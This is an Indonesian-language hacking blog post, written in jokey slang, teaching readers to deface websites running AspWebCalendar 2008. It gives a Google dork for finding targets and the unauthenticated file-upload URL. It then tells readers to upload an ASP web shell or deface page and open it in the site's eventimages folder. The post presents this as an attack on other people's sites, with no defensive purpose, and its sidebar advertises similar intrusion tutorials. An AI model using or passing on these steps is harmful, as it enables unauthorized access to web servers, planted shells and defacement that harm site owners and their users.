Tutorial deface AspWebCalender 2008 Remote File Upload Vulnerability

hay guys :v cie ketemu lagi neh sama cakil
ok kali ini cakil akan kasih tutor deface AspWebCalender 2008 Remote File Upload Vulnerability
poc ini sudah lama ea :) mungkin sadja blm ada yang tau hehehe :v

yuk simak baik baik..

Dork :inurl:/calendar.asp?eventdetail
(kembangin pake otak kalian)

1. Dorking di hatiku.cie di hatiku wkwkwk canda
dorking di mbah google, lalu pilih web target yg mau di eue :v

Exploit: /path/calendar_admin.asp?action=uploadfile

2. masukin exploitnya di belakang url target
www.target.co.li/path/calendar_admin.asp?action=uploadfile
vuln? bakal ada tempat upload
(liat gambar)
3.karna disini saya lagi kurang beruntung maka saya hanya nitip file sadja

upload shell/sc deface kamu dengan ekstensi asp.
contoh cakil.asp
(liat gambar)
4. vuln bakal ada tulisan success
5.akses file ?
www.target.co.li//path/calendar/eventimages/shell.asp

cie sukses heheh..
sangad mudah bukan ?
ok sekian dan terima kasih..
tunggu updatean terbaru kami ya :)

Tutorial deface AspWebCalender 2008 Remote File Upload Vulnerability

0 Comments

Facebook

Main Labels

Categories

sitemap

Search This Blog

Popular Posts

Mengetahui IP Asli Dari website Yang Terpasang Cloudfire

How To Sniff Username And Password With Wireshark

Tutorial Inject Backdoor Android Application (Metasploit)

Tags

Menu Footer Widget

Tutorial deface AspWebCalender 2008 Remote File Upload Vulnerability

You may like these posts

0 Comments

Follow Us

Facebook

Main Labels

Categories

sitemap

Search This Blog

Popular Posts

Mengetahui IP Asli Dari website Yang Terpasang Cloudfire

How To Sniff Username And Password With Wireshark

Tutorial Inject Backdoor Android Application (Metasploit)

Tags

Menu Footer Widget